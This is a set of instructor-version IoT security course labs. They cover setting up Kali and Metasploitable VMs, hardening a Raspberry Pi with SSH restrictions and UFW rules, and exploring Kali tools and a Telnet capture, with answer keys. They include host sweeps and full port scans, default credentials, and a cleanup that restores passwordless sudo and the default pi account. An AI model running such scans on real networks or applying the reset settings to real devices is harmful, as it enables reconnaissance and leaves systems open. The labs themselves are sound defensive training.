PL-App launcher.
Note: For now, do not connect Raspberry Pi devices to the network.
Instructor Note: The topology diagram provided above should serve as a guideline for the communication
requirements for a single PC and Raspberry Pi pair. Depending on the lab environment and the resources
available, it is possible that multiple pairs will be connected to the same switch.
Internet access is not required after the files have been downloaded. This is to isolate the student hosts from
the campus network to avoid abuse of the Kali penetration testing tools on a production network.
To avoid the possibility that Kali could be used on the school network, the Kali VM will be directly connected
to the Raspberry Pi in Part 2 of this lab. A number of PCs and Raspberry Pi devices can be connected to
each other using a switch as well. It is important that the switch not uplink to the Internet. In addition, Kali is
preconfigured with an address on the 203.0.113.0/24 network. This network is reserved for documentation
and testing.
Step 1: Download and Install Oracle VirtualBox.

a. Navigate to the Oracle VirtualBox downloads page.
b. Choose and download the appropriate installation file for your operating system.
c. After you have downloaded the VirtualBox installation file, run the installer and accept the default
installation settings.
d. Download the IoT Security VM file from here: Kali OVA and Metasploitable OVA.
Step 2: Connect the Network Topology

a. Disconnect the PC from the school network and directly connect the PC to the Raspberry Pi with the
Ethernet patch cable.
Part 2: Import the IoT Security Virtual Machines
Step 1: Import the virtual machine appliance into VirtualBox.

You will open VirtualBox and import the IoT Security Kali VM .ova file to create a Kali virtual machine.
Note: The screen may look different depending on your version of VirtualBox.
a. Open VirtualBox. From the file menu, select: File > Import Appliance. Locate and select the
Kali_IoTSec.ova file that you downloaded and click Next.
b. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at the bottom of the window. Leave all other settings as
default. Click Import.
c. After the import is complete, VirtualBox will show the new Kali VM in its inventory. Your Kali Linux VM file
name might be different than the graphic shown below.
d. Repeat the import process for the Metasploitable VM.
Step 2: Verify Network Connectivity.

In this step, you will ensure that networking is configured between the VMs and the Raspberry Pi.
The host computer has been disconnected from the campus network and connected directly to the Raspberry
Pi. Because DHCP will no longer be available from the network DHCP service, we will need to run a Linux
shell script. The script will start a DHCP server on the Kali VM. This will provide the Raspberry Pi to with an IP
address. TCP/IP communication will then be established between the VMs and the Raspberry Pi.
Instructor Note: If you are using a network switch to connect the PC and Raspberry Pi pairs, please alter this
instruction accordingly.
a. Return to the VirtualBox VM player window. Highlight the Kali VM in the list.
b. Click the green Start arrow in the menu bar. After a brief delay, you should see a new window open that
displays a Username: field.
c. Enter the username of root and click Next to continue. Use toor for the password and click Sign in. If
you have typed the username incorrectly for the Kali VM, click Cancel to input the correct username.
d. After Kali starts, you should see the desktop as shown below.
e. Click the Terminal icon in the desktop applications bar as shown in the figure.
f. Run the shell script that will configure IP addressing. To run the script, at the terminal prompt type the
following:
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
g. After the script executes, at the terminal prompt, type ifconfig.
root@kali:~# ifconfig
What IP address was assigned to the VM eth0 interface? ____________________________ 203.0.113.1
h. Minimize the VirtualBox window and open PL-App. Select the Available Devices tab. You should see your
Raspberry Pi listed. Make note of the IP address of your Raspberry Pi.
IP address of the Raspberry Pi: ___________________________________
Note: If PL-App is not showing the IP address of the Raspberry Pi, use the command fping at the
terminal window to determine the IP address.
root@kali:~# fping -a -r 0 -g 203.0.113.0/24
Warning: The use of fping can be considered as an attack. Please do not use this command on a
production network.
i. Return to the VM. At a terminal prompt, ping the IP address of your Raspberry Pi. Use the -c 5 parameter
to limit your ping to five echo requests. If everything is working properly, you should see five successful
echo replies. You have now tested the connection between the Kali Linux virtual machine and the
Raspberry Pi.
j. Now open the Firefox ESR browser from the Kali desktop applications bar. Its icon is just above the
Terminal icon.
k. Type the IP address of the Raspberry Pi into the address bar and press Enter. You should see the
Jupyter notebooks home page appear.
Note: Because the VM shares the same network adapter as the physical computer, you can access the
Pi from either machine.
l. Start and log into the Metasploitable VM. Notice the displayed messages.
What is the login credential?
____________________________________________________________________________________
Username: msfadmin password: msfadmin
What is the IP address assigned to Metasploitable VM? What was the command used to determine the IP
address?
____________________________________________________________________________________
The IP address is 203.0.113.5. The command used to determine the IP address is ifconfig.
Note: To release the mouse from Metasploitable VM, press the right control key.
m. To verify network connectivity, you should be able to ping all the VMs and the Raspberry Pi.
Step 3: Shut down the VMs.

a. In the VirtualBox menu in the Kali VM window, select File > Close.
b. Click the Save the machine state radio button and click OK. The next time you start the virtual machine,
you will be able to resume working in the operating system in its current state.
The other two options are:
 Send the shutdown signal: This option simulates safely shutting down a physical computer.
 Power off the machine: This option simulates an unsafe shutdown of a physical computer.
c. Repeat the shutdown process for the Metasploitable VM.
Lab - Harden a Raspberry Pi (Instructor Version)
Topology
Objectives
Part 1: Securing Remote Access
Part 2: Removing the Default Pi User Account
Part 3: Configuring the Uncomplicated Firewall (UFW)
Background/Scenario
The Raspberry Pi is a doorway to the Internet of Things (IoT). In this lab you will take a Raspberry Pi that is
acting as an IoT gateway device and perform device hardening. You will harden the Raspberry Pi by following
recommended security practices for the Raspbian OS. You will also limit the network protocols and services
allowed to connect to the IoT gateway by activating and configuring the Uncomplicated Firewall (UFW).
Finally, you will utilize a separate Kali VM with the Kali Linux OS, acting as a threat actor, to test the security
of the IoT gateway.
Required Resources
 Raspberry Pi 3 Model B or later (with PL-App)
 8GB Micro SD card (minimum required)
 PC with IoTSec Kali VM
 Network connectivity between PC and Raspberry Pi
Part 1: Securing Remote Access

The Raspberry Pi comes with a default user called “pi” with the default password of “raspberry” which is well
known. While this makes it easy to use the system, it is not very secure. Anyone with network access to your
Pi could login with these widely known credentials. Furthermore, because the SSH server and HTTP server
Lab - Harden a Raspberry Pi
on the Pi are enabled, unknown users on the network could attempt a connection using these default
credentials. While basic security would advise the changing of the password for the “pi” user, having a default
username alone is a security risk.
Step 1: Access the Raspberry Pi remotely.

a. Connect the Raspberry Pi to the Kali VM host as shown in the topology.
b. Start the Kali VM and login with the username root and the password toor.
c. On the Kali VM, run the shell script to configure IP addressing. To run the script, at the terminal prompt
type the following:
d. Use the PL-App or the command fping -ag 203.0.113.0/24 in a terminal on the Kali VM to determine the
IP address of your Raspberry Pi.
Record the IP address of your Raspberry Pi. ________________________________________________
e. Every Raspberry Pi has the default username pi and password raspberry. Use SSH to remotely access
the Raspberry Pi. The IP address used in this lab is only used as an example, the IP address for your
Raspberry Pi may be different. The IP address for your Raspberry Pi will be in the subnet of
203.0.113.1/24.
Open a terminal on the Kali VM and SSH into your Raspberry Pi using the pi account.
root@kali:~# ssh pi@203.0.113.12
If you were unsuccessful, you can start the service from the PL-App terminal through the web interface:
(pl-app) root@myPi:~# systemctl enable ssh
(pl-app) root@myPi:~# systemctl start ssh
The enable command allows the service to restart automatically after the system reloads. The start
command only starts the service during this session, and the service will no longer be available after a
reboot without starting it again manually.
For more information about enabling SSH, navigate to
https://www.raspberrypi.org/documentation/remote-access/ssh/.
Step 2: Securing the user accounts

As we know, while basic security would advise the changing of the password for the pi user, just having a
default username is a security risk. Instead, you will create a new user with sudo permissions. After the new
user has the appropriate permissions, the default pi user can be deleted.
Note: The name of the Raspberry Pi that appears in the terminal will differ depending on the device name
that was configured in PL-App launcher when the SD card was made.
a. Add a new user to the Raspberry Pi with the command sudo adduser kingbob in the terminal. Choose a
secure password to use and provide any user information desired.
pi@IoTpi:~ $ sudo adduser kingbob
b. Give the kingbob user sudo permissions by adding it to the sudo group with the command sudo adduser
kingbob sudo.
pi@IoTpi:~ $ sudo adduser kingbob sudo
Adding user `kingbob' to group `sudo' ...
Adding user kingbob to group sudo
Done.
c. To stop the Raspberry Pi from logging in to a user account automatically at boot, issue the sudo raspi-
config terminal command.
pi@IoTpi:~ $ sudo raspi-config
d. Select Boot Options to configure options for start-up.
e. Select Desktop / CLI to choose whether to boot into a desktop environment or the command line.
f. Select Console to require users to log into text console.
g. Select Finish and click Yes to reboot when prompted.
h. After reboot, use the Kali VM to SSH into the kingbob account of the IoTpi.
root@kali:~# ssh kingbob@203.0.113.12
Step 3: Secure remote access.

The general implementation of SSH as the method for remote access in itself does not provide strong
security. The default installation for SSH uses a single password, commonly with a default value. To
implement stronger security when deploying an SSH server, a username and password combination should
be implemented. This step includes the activation of the SSH service and restriction of SSH authentication
attempts.
Note: The usernames are for example only. Choose your desired usernames. Create a new user account for
specifically utilizing remote access connections.
a. You will create kevin, a standard user, with the command sudo adduser kevin. Provide the necessary
information when prompted.
kingbob@IoTpi:~ $ sudo adduser kevin
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.

#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for kingbob:

b. Finally, you will edit the sshd_config file located in the /etc/ssh directory to limit the users that are
allowed to access this device using SSH.
Edit the /etc/ssh/sshd_config file by adding the following lines to the end of the file:
AllowUsers kingbob
DenyUsers kevin
Edit the file by using a text editor, such as nano.
kingbob@IoTpi:~ $ sudo nano /etc/ssh/sshd_config
Predict the success of SSH access for the users kingbob and kevin. Record your predictions below.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The AllowUsers kingbob command permits SSH authentication using the username and password for
the local kingbob account. The DenyUsers kevin command prevents SSH authentication using the kevin
credentials.
c. To force the SSH settings to take effect now, restart the SSH service using sudo systemctl restart ssh.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
d. Verify that the kevin user account cannot be exploited by a threat actor via the SSH service. Issue the
command ssh kevin@203.0.113.12 to attempt an SSH connection with the kevin username.
root@kali:~# ssh kevin@203.0.113.12
e. After issuing the password for the kevin user account the IoT gateway reports SSH access is denied.
kevin@203.0.113.12's password:
Permission denied, please try again.
f. SSH into the Raspberry Pi using the kingbob account, which is permitted to access the IoTpi via SSH.
Part 2: Removing the Default Pi User Account
Step 1: Open a terminal and remove the Pi account but leave the directory.
a. To remove the pi account from the IoT gateway, make sure you are logged into the “kingbob” account.
Then, enter the sudo deluser pi command in the terminal.
kingbob@IoTpi:~ $ sudo deluser pi
Removing user `pi' ...
Warning: group `pi' has no more members.
Done.
Step 2: Require a password with the command sudo.

The Raspbian OS does not require a password when placing sudo in front of a command to run it as a
superuser, by default. If your IoT gateway is exposed to the Internet and somehow becomes exploited
(perhaps via a webpage exploit for example), the attacker will be able to change items that require superuser
rights, unless you have set sudo to require a password.
a. To force sudo to require a password, you will edit the file /etc/sudoers.d/010_pi-nopasswd.
kingbob@IoTpi:~ $ sudo nano /etc/sudoers.d/010_pi-nopasswd
pi ALL=(ALL) NOPASSWD: ALL
List all the users who can access superuser privileges without inputting their password.
____________________________________________________________________________________
Answers can vary. The user pi is probably the only one that has superuser access at this time.
b. Replace the pi entry with your username, kingbob, with superuser rights.
kingbob ALL=(ALL) PASSWD: ALL
c. Now save the file and reboot.
kingbob@IoTpi:~ $ sudo reboot
How would you verify that the pi user account has been deleted?
____________________________________________________________________________________
____________________________________________________________________________________
Search for pi in /etc/passwd or other files that have username info. A sample command to look for pi: grep
pi /etc/passwd
Part 3: Configuring the Uncomplicated Firewall (UFW)

Uncomplicated Firewall (UFW) provides a more user-friendly framework than the traditional iptables firewall.
Iptables has handled the security for Linux for a long time but UFW provides a much simpler interface with a
good amount of power. The UFW is already installed on the IoT gateway Pi, but it needs to be activated and
configured to limit dangerous protocols and services, while allowing important connections to be available.
You will also use network mapper (Nmap) to rapidly scan the network. Nmap is a network scanning tool that
allows you to discover network hosts and resources, including services, ports, operating systems, and other
fingerprinting information. Nmap should not be used to scan networks without prior permission. The act of
network scanning can be considered a form of network attack.
Nmap will test the firewall port/service restriction and IPS capabilities of the IoT gateway. You will run the
scanning program from the Kali Linux VM and attempt to scan open ports on the IoT gateway before and after
viewing the Uncomplicated Firewall (UFW) rules.
Step 1: Identify what network services are listening on the Pi.

a. Connect to the IoT gateway Pi over SSH as kingbob.
b. Start the Telnet and vsftpd servers. These services are started in this lab for demonstration purposes.
They are only available until the Raspberry Pi is reloaded.
kingbob@IoTpi:~ $ sudo systemctl start openbsd-inetd.service
kingbob@IoTpi:~ $ sudo systemctl start vsftpd
c. Open a new terminal on the Kali VM and perform an Nmap scan targeting the TCP ports of the Pi. This
scan checks all TCP ports in the range of 1-65535.
root@kali:~# nmap -p 1-65535 203.0.113.12
Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 13:59 EDT

Nmap scan report for 203.0.113.12
Host is up (0.00043s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds
d. On the Pi, the currently open TCP sessions can be viewed by using ss -t:
kingbob@IoTpi:~ $ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 168 203.0.113.12:ssh 203.0.113.11:34730
Step 2: Check the status of the UFW.

a. SSH into the kingbob account, which is the only account allowed to access the Pi.
b. Enter sudo ufw status to view the current state of the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw status
Status: inactive
c. If you’d like to specifically view rules added to the UFW, enter sudo ufw show added.
kingbob@IoTpi:~ $ sudo ufw show added
Added user rules (see 'ufw status' for running firewall):
(None)
Step 3: Configure firewall rules for the Uncomplicated Firewall (UFW).

a. At this time there are no rules configured in the UFW. However, when the UFW service is started, the it
includes a hidden implicit deny rule to block any traffic not explicitly allowed. While this means all traffic is
dropped by default, we’d like to ensure that specific insecure protocols are denied regardless of future
configured allow statements.
b. Configure a statement to explicitly deny Web traffic
kingbob@IoTpi:~ $ sudo ufw deny http
Rules updated
Rules updated (v6)
c. Configure a statement to explicitly deny telnet traffic
and FTP.
kingbob@IoTpi:~ $ sudo ufw deny telnet
Rules updated
Rules updated (v6)
d. Configure a statement to explicitly deny ftp traffic
kingbob@IoTpi:~ $ sudo ufw deny ftp
Rules updated
Rules updated (v6)
Step 4: View the configured firewall rules for the UFW.

a. View the rules added to the UFW, enter sudo ufw show added
kingbob@IoTpi:~ $ sudo ufw show added
Added user rules (see 'ufw status' for running firewall):
ufw deny 80/tcp
ufw deny 23/tcp
ufw deny 21/tcp
b. At this point, we are NOT ready to activate (enable) the UFW service. Because the UFW includes an
implicit deny rule for any traffic not explicitly permitted, we could have our SSH session terminated and be
locked out of the Pi.
c. Configure a statement to explicitly permit secure remote access (SSH).
kingbob@IoTpi:~ $ sudo ufw allow ssh
Rules updated
Rules updated (v6)
d. To activate the UFW firewall, which is disabled by default, enter sudo ufw enable. Ensure that you have
added the allow ssh statement to the UFW before activating the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
Instructor Note: If a student accidentally enables UFW without first permitting SSH, the Pi will be
unreachable over the network. If this occurs, you may be able to access the Pi directly by connecting a
keyboard and monitor, or by creating a new SD card image with PL-App.
e. Observe the UFW firewall rules.
You should see the UFW rules that you have created using the sudo ufw status command.
Status: active
To Action From
-- ------ ----
80/tcp DENY Anywhere
22/tcp ALLOW Anywhere
80/tcp (v6) DENY Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
The Allow statements are showing the permitted connections available.
Step 5: Decrease the threat surface of SSH.

At this time, even though the only accessible service is SSH, SSH can become vulnerable to a brute force
user/password attack. To prevent or better mitigate this threat, a limitation on the number of login attempts in
a specific period of time should be applied.
a. Limit the login attempts for the SSH service using the sudo ufw limit ssh/tcp command.
kingbob@IoTpi:~ $ sudo ufw limit ssh/tcp
Rules updated
Rules updated (v6)
Note: The UFW limit command denies future connections if the same IP address has attempted to
connect six or more times in the last 30 seconds. (This acts as a basic intrusion prevention system (IPS)
for SSH to prevent brute force attacks.)
b. View the UFW rules again using sudo ufw status. What action is now in place for SSH connections
destined for the Pi?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary but should include that the action listed is “Limit” which is allowing connections that
authenticate successfully within the first 6 attempts in a period of 30 seconds.
c. According to the UFW rules, if a permit HTTPS rule is NOT created, what will happen to HTTPS traffic
that arrives at the IoTpi interface?
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include that any protocol/service that is not specifically permitted will be denied. HTTPS
sessions targeting the Pi will be denied by the UFW.
Step 6: Run Nmap and set scanning options.

a. Open a terminal on the Kali Linux VM.
b. Perform another Nmap scan targeting the TCP ports of the Pi.
root@kali:~# nmap -p 1-65535 203.0.113.12
Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 14:12 EDT

Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)
Nmap done: 1 IP address (1 host up) scanned in 121.88 seconds

c. The Uncomplicated Firewall (UFW) on the Pi is preventing the scan from accessing the denied services.
Compare the above output with the previous Nmap scan. What protocols are no longer reachable on the
Pi from the Kali VM?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary but should include that when the comparison is done between this Nmap scan and the
one from Part 3 Step 1, both FTP and Telnet are no longer reachable as they have been denied in the
UFW.
How many open ports did Nmap find on the IoT Gateway?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the lab but should include at a minimum SSH.
What are the associated port numbers and services?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the lab but should include at a minimum SSH 22.
d. The Telnet and vsftp services could also be stopped so these services are no longer enabled.
kingbob@IoTpi:~ $ sudo systemctl stop openbsd-inetd.service
kingbob@IoTpi:~ $ sudo systemctl stop vsftpd
Part 4: Cleanup
It is very important to harden any IoT gateway device to protect against cybersecurity incidents. However, for
classroom purposes, the Raspberry Pi device should be returned to its original configuration so that other
users can access it as required for other courses.
Step 1: Restore the default user account.

The default user account pi is restored with all the default privileges.
a. Add the user account pi with superuser privileges. Use the default password raspberry for the user pi.
kingbob@IoTpi:~ $ sudo adduser pi
Adding user `pi' ...
Adding new group `pi' (1000) ...
Adding new user `pi' (1000) with group `pi' ...
The home directory `/home/pi' already exists. Not copying from `/etc/skel'.
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pi
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
kingbob@IoTpi:~ $ sudo adduser pi sudo
b. Restore the SSH access for all the users by deleting the last two lines in the file /etc/ssh/sshd_config.
Delete the lines: AllowUsers kingbob, DenyUsers kevin. Save the file.
kingbob@IoTpi:~ $ sudo nano /etc/ssh/sshd_config
c. Edit the file /etc/sudoers.d/010_pi-nopasswd is returned to the default state. Change kingbob to pi.
kingbob@IoTpi:~ $ sudo nano /etc/sudoers.d/010_pi-nopasswd
pi ALL=(ALL) NOPASSWD: ALL
Step 2: Disable UFW and restore defaults.

In this step, you will disable and reset UFW.
a. Enter the command sudo ufw reset to disable and UFW.
kingbob@IoTpi:~ $ sudo ufw reset
[sudo] password for kingbob:
Resetting all rules to installed defaults. This may disrupt existing ssh
connections. Proceed with operation (y|n)? y
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181127_000859'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181127_000859'
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181127_000859'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181127_000859'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181127_000859'

Backing up 'user.rules' to '/etc/ufw/user.rules.20181127_000859'
b. Verify the status of UFW is inactive.
c. Before you reboot the Raspberry Pi device, verify that the user pi can log into the device via SSH. Restart
the SSH service and log in as pi.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
kingbob@IoTpi:~ $ ssh pi@localhost
If you are unable to log into the Pi device using the user pi, verify that you have configured the user
account and SSH configurations correctly from the previous steps.
d. Reboot the Raspberry Pi device.
Step 3: Remove unnecessary users.

In this step, you will remove the unnecessary users and their home directories.
a. Log into the Raspberry Pi device as the default user pi.
b. Remove the users kevin and kingbob and their home directories.
pi@IoTpi:~ $ sudo deluser --remove-home kevin
Looking for files to backup/remove ...
Removing files ...
Removing user `kevin' ...
Warning: group `kevin' has no more members.
Done.
pi@IoTpi:~ $ sudo deluser --remove-home kingbob
Looking for files to backup/remove ...
Removing files ...
Removing user `kingbob' ...
Warning: group `kingbob' has no more members.
Done.
Reflection
1. What are some common ports and services that may exist on an IoT device and should be locked down that
were not mentioned in this lab?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary but can include port numbers and/or services such as TFTP using TCP port 69, etc.
2. What type of device could be used to recognize an Nmap scan and actively prevent the port scan and host
sweep?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
To actively prevent a scan from retrieving details about a host or network, an IPS device would be used. AN
IPS could recognize the number of connection attempts from the threat actor as excessive and
block/quarantine the traffic.
Lab – Investigate Vulnerability Assessment Tools (Instructor
Version)
Objectives
Part 1: Exploring Kali Linux
Part 2: Investigating Nmap and Zenmap
Part 3: Using Wireshark to Open and Analyze a pcap File
Kali Linux is a Debian-based Linux distribution that contains tools for advanced penetration testing and
security auditing. Kali contains several hundred tools which are used for a wide variety of information
technology security tasks. In this lab, you will explore some of the tools available in Kali Linux.
Note: Only use Kali tools on networks on which you are authorized to do so.
Required Resources
 PC with at least 1 GB of RAM and 15 GB of free disk space with IoTSec Kali VM
Part 1: Exploring Kali Linux
Step 1: Start the Kali VM.

a. On your PC, open Oracle VirtualBox. Select the IoTSec Kali VM that was installed in a previous lab.
b. Click the green Start arrow in the menu bar. After a brief delay, you should see a new window open that
displays a username field.
c. Enter the username root and click the Next button. Use toor for the password and click Sign in. If you
have typed the username incorrectly, click Cancel to input the correct username.
Step 2: Explore Kali Linux.

Kali Linux contains a number of tools for various information security tasks. To make it easier to use the tools,
they have been organized into different categories.
a. Explore the Kali menus. How many categories of tools are there in Kali Linux?
____________________________________________________________________________________
14 categories of tools
Lab – Investigate Vulnerability Assessment Tools
b. Find each of the tools in the table below in the Kali Applications menu. Investigate each and fill in the
table below. You may need to run the tools to determine the type of interface that is used.
Note: Using any of these tools on actual networks could violate the ethical hacking policy for this course
and may break the law.
Tool Category Interface (GUI or Command line)
Nmap
Zenmap
SQLmap
Skipfish
Wireshark
Part 2: Investigating Nmap and Zenmap

Use the “Kali Linux Tools Listing” web page accessible at the link https://tools.kali.org/tools-listing to research
the answers to the following questions:
Step 1: Learning about Nmap

a. Find the Kali Tools page for Nmap. In what two categories is Nmap listed?
____________________________________________________________________________________
____________________________________________________________________________________
Information Gathering and Vulnerability Analysis
b. What is Nmap primarily used for?
____________________________________________________________________________________
____________________________________________________________________________________
Network discovery and security auditing. It discovers hosts on a network and lists various information
about the hosts.
c. Nmap has many options. How does a penetration tester tell Nmap which options to use? (You can see
some of the options the in the Nmap Usage Example entry on the Nmap Kali Tools page.)
____________________________________________________________________________________
____________________________________________________________________________________
Options are specified by passing arguments to the Nmap command.
We will use Nmap later in the course.
Step 2: Learning about Zenmap

Zenmap is a network scanning tool that allows you to discover network hosts and resources, including
services, ports, operating systems, and other information. Zenmap should not be used to scan networks
without prior permission. The act of network scanning can be considered a form of network attack.
a. What is the relationship between Zenmap and Nmap?

____________________________________________________________________________________
____________________________________________________________________________________
Zenmap is a GUI frontend for Nmap.
b. How many default scan profiles are available in Zenmap?
____________________________________________________________________________________
____________________________________________________________________________________
By default, Zenmap has 10 different scan profiles. The profiles are pre-configured settings that define the
options for the scan. Choose a profile by selecting it from the “Profile” combo box. It’s also possible to edit
these profiles or create new ones.
c. When we change the profile, we see also see changes in the Command field. What does the Command
field contain?
____________________________________________________________________________________
____________________________________________________________________________________
It contains the Nmap command options that correspond with the profile.
Part 3: Using Wireshark to Open and Analyze a pcap File

Wireshark is a software protocol analyzer, or "packet sniffer" application. Wireshark captures traffic on a
network segment and provides features that simplify analysis of the traffic. Wireshark can be used for learning
about networking, monitoring and troubleshooting networks, and network software development. Wireshark
captures each frame transmitted on the network and provides access to details about the upper levels of the
protocol stack at the internet, transport, and application layers of the TCP/IP model.
a. Open Wireshark in the IoTSec Kali VM by either finding it in the application menu or typing wireshark at
a terminal prompt.
b. Ignore any errors that might appear and go to the Wireshark file menu. Open the file
/root/lab_support_files/PCAP_files/PlainText.pcap.
The pcap file contains a protocol capture of a Telnet session between the client 192.168.0.2 and a Telnet
server. The client is attempting to open a terminal on the server in order to execute commands on it. Use
Wireshark to answer the following questions.
c. What is the IP address of the Telnet server?
____________________________________________________________________________________
192168.0.1
d. What protocols are used in the captured data conversation?
____________________________________________________________________________________
____________________________________________________________________________________
TCP and Telnet
e. Go to the Analyze menu and select Follow > TCP Stream. A window appears that shows the data
exchanged between the client and server. The color coding identifies which host is the source of the data.
If you click any part of the conversation, the corresponding frame will be selected in the capture window.
What is the username and password used for authentication of the session?
____________________________________________________________________________________
____________________________________________________________________________________
fake:user
What operating system is running on the server?
____________________________________________________________________________________
OpenBSD
Which commands were sent from the client to be executed on the server??
____________________________________________________________________________________
____________________________________________________________________________________
ping www.yahoo.com, ls -a
How did the server respond?
____________________________________________________________________________________
____________________________________________________________________________________
The server responded with six ping return messages, ping summary statistics, and a listing of directories.
This packet capture illustrates an important security vulnerability that exists in the Telnet protocol. What is
this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
Telnet sends all data in clear text. The username and password can be read by anyone who could
execute a packet capture on this network segment. In addition, all data that is returned by the server is
also transmitted as clear text. A threat actor could use Wireshark to capture sensitive information in a
Telnet session if access to the network were possible.
Lab – Create an IoT Sensor-Actuator System (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.
Lab Topology (and Representations)
Connectivity requirements: As shown in the topology, the Raspberry Pi must be able to reach the Internet
and must also be reachable from a student computer via the network so that code can be completed in a
Jupyter Notebook.
Addressing
No specific addressing is required as long as the communications requirements are met.
Objectives
• Build a simple electronic circuit that is under control of the Raspberry Pi.
• Create a simple control app using IFTTT and dweet.io.
• Configure an IFTTT app as a widget in Android or iOS.
• Complete Python code that will control an end-to-end IoT system.
• Use a smartphone to trigger actions of Raspberry Pi through IFTTT.
• Describe possible security vulnerabilities of a such IoT system.
Lab - Create an IoT Sensor-Actuator System
IoT systems often consist not only of sensor and actuator electronics, but also of software applications that
control the systems through a cloud platform. In home automation systems, sensors and actuators in the
home connect to the local network over Wi-Fi and a cloud management platform through the Internet. The
cloud management platform collects data from the IoT system and enables control of it from either a browser
or specialized app that runs on a mobile device.
When evaluating system security, it is useful to break the system down into parts in order to identify different
areas of potential vulnerability.
In this lab, you will build a simple circuit that is controlled by the Raspberry Pi. Then, through the integration of
two web services, you will create a simple app that can control the circuit from a mobile device, either over a
cellular or Wi-Fi connection. To complete this lab, you will use your circuit building and Python skills from the
IoT Connecting Things course. Finally, you will analyze the system to identify potential vulnerabilities at the
device, communication, and application layers of the simplified IoT model.
Required Resources
• PC or laptop
• Raspberry Pi 3, Model B or B+, with PL-App
• Breadboard
• Two 330 Ohm resistors
• Two LEDs, one red and one green
• Jumper wires
• IFTTT account
• Smart phone with recent operating system (Requires iOS 9.0 or higher, or Android devices running 4.1 or
higher.)
• IFTTT app for Android or iOS
• Incoming Internet access to the Raspberry Pi over HTTPS (port 443)
• Network connectivity between host and Raspberry Pi
Part 1: Build and Test the Circuit
Step 1: Build the circuit and connect to the Raspberry Pi

a. Obtain the required components and construct the circuit as shown below. The anode leg of the red LED
is to be connected to GPIO pin number 21 based on the BCM GPIO scheme of the Raspberry Pi 3. The
anode leg of the green LED is to be connected to the GPIO pin number 20 based on the BCM GPIO
scheme of the Raspberry Pi 3.
Use the schematic to make the connection from the circuit to the Raspberry Pi.
Schematic:
Pinouts:
When complete, your circuit should resemble the illustration below:
Step 2: Test the circuit.

Complete and run the code according to the instructions in the code comments. Run the code and observe
the circuit.
a. Import the modules that are required to for the lab.
# Code Cell 1.
# Import the dweepy module that is a collection of functions that make it
# easier to communicate with dweet.io
import dweepy
# Import the GPIO modules to control the GPIO pins of the Raspberry Pi
import RPi.GPIO as GPIO
# Import the time module to control the timing of your application (e.g. add
delay, etc.)
import time
b. Setup the Raspberry Pi hardware. Add values for the pin numbers for the GreenLEDPin and RedLEDPin
variables. Get the values you need from the circuit connections.
In this code cell, and several others below, students are required to add values to the code. The areas
where values are required are indicated by comments that say "Add values." In addition, the areas of
code requiring completion are indicated with lines of equal signs: ===================.
# Code Cell 2.
#Setup hardware
# Set the desired pin numbering scheme:
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#Create variables for the GPIO PINs the LEDs are connected to
# ============================================
# the PIN of the green LED
GreenLEDPin = 20 #Add values: add the pin number for the green LED
# the PIN of the red LED
RedLEDPin = 21 #Add values: add the pin number for the red LED
#=============================================
# Setup the direction of the GPIO pins - either INput or OUTput

# The PINs that connect LEDs must be set to OUTput mode:
GPIO.setup(GreenLEDPin, GPIO.OUT)
GPIO.setup(RedLEDPin, GPIO.OUT)
c. Test your circuit. Turn the LEDs on and off by setting their output values to True or False in the code
below. Add values for the second pair of on and off settings. Use the first set, and the comments to guide
you. Timers are used to make it easier to observe the LEDs. Run the code Cells 1, 2, and 3 and observe
the results.
# Code Cell 3.
#Test the circuit by changing the state of the GPIO pins
#This code will cycle twice.
for i in range(2):
print("Green ON Red Off")
GPIO.output(GreenLEDPin, True) # True = set 3.3V on the pin
GPIO.output(RedLEDPin, False) # False = set 0V on the pin
time.sleep(1) #Wait one second.
print("Green OFF Red ON")
#======================================
GPIO.output(GreenLEDPin, False ) # Add values: turn the LED off
GPIO.output(RedLEDPin, True ) # Add values: turn the LED on
#======================================
time.sleep(1) #Wait one second.
GPIO.output(RedLEDPin, False) #turn off red LED after loop
What happens when the code successfully runs?
____________________________________________________________________________________
____________________________________________________________________________________
The green LED lights for one second. It goes out and the red LED lights. Then it goes out. This happens
two times.
d. Modify the code to change its behavior. For example, change the number of times that the code cycles
